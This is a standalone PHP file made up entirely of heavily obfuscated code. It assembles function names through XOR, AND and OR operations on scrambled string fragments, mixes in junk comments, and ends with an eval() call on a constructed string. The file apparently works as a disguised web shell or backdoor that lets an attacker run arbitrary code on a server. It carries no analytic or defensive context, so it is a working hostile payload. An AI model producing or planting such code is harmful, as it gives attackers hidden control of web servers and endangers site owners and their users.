<?php
$LQ72A='wB'^Uggi;$kJf='ew`ans'&'gmO%gv';$Ez3fM1='P('.FDpL.')@-H)!'|'H [@PH!@.@%)';'PN'.
       'IGVeO}Z0';$eizKd0DXZ='(Z*#- H0B LL'|"(B2 *>D A)B@";$pVBLA='w|~'./*exTSLpz9lTC'.
       'U4&IY*/gorfwrkun7y.'}y{7'.wwwv.'?;'.yziw.'~}{u'&'ww~w~'.vkw6.'{gnw{}y~;u?wu~1'.
       ''.y3uwx.'}9w';$fLt4v='1TIT'^'^5f!';$j0swThdxcl='%x@4'|'$HI4';$PQdJgirI1t=#SqS'.
       'A&yx'&Y8ke;$re8oih_ux=w&q;$STKU4E7b=')'|e;$XofuJclhIeu='jvT|_Q'&']]'.vR_m;'eu'.
       'V~r';$X5Z='J^'.TQ_x_KQIOOo_VISUL&'HT~'.t_Z_zRJOnU_LM_zo;$VwTnR=':'^"{";$WF=#f'.
       '['&']';$MbvG7=('le~}o{{}oko'&'|e~en{{~wk~')&(JTFep.'#lR=)N'|'&apP>r '.glhh);/*'.
       '$r7)&$*/$fMrumC=('OW^'^'"sj')|(HAW^'-!v');$aMbmg21=$kJf|('!^]l|J'^'c~i(6>');/*'.
       'o*/$dtUW6AcS1Bi=$Ez3fM1^$eizKd0DXZ;$JgUNxi7Dj=('$6F`f@'.b12e.'##2G%9#5)03`s~;'.
       '2&289#8'|';1"1@&@$8d@g%'.g62aG.'@!"D4^90C7  2 ')&$pVBLA;$QjgfCS9p20=(/*H11Wi4'.
       'S).P*/"?woo"&'?woo')&$fLt4v;$C2jHqfG7=$j0swThdxcl|$PQdJgirI1t;$dx9pO4v=/*Cfd2'.
       '375k)LF<*/$re8oih_ux&$STKU4E7b;!$MbvG7($fMrumC($aMbmg21($XofuJclhIeu)),/*IRjo'.
       'BnfFZW=a*/$JgUNxi7Dj) or $dtUW6AcS1Bi($QjgfCS9p20,$C2jHqfG7,$dx9pO4v);eval(/*'.
       '1qr*/$aMbmg21($X5Z.$VwTnR.$WF));#F[jS(&MQGaCTiLu?i8o2BZ(>yN%[}ET~t0&K)&kvn[O'.
       'Af]YYpTu=BcOgeVn@c1 IreWTUqM_DQal(@Mv+[.,<,r3}VBJRhTA;[I0@';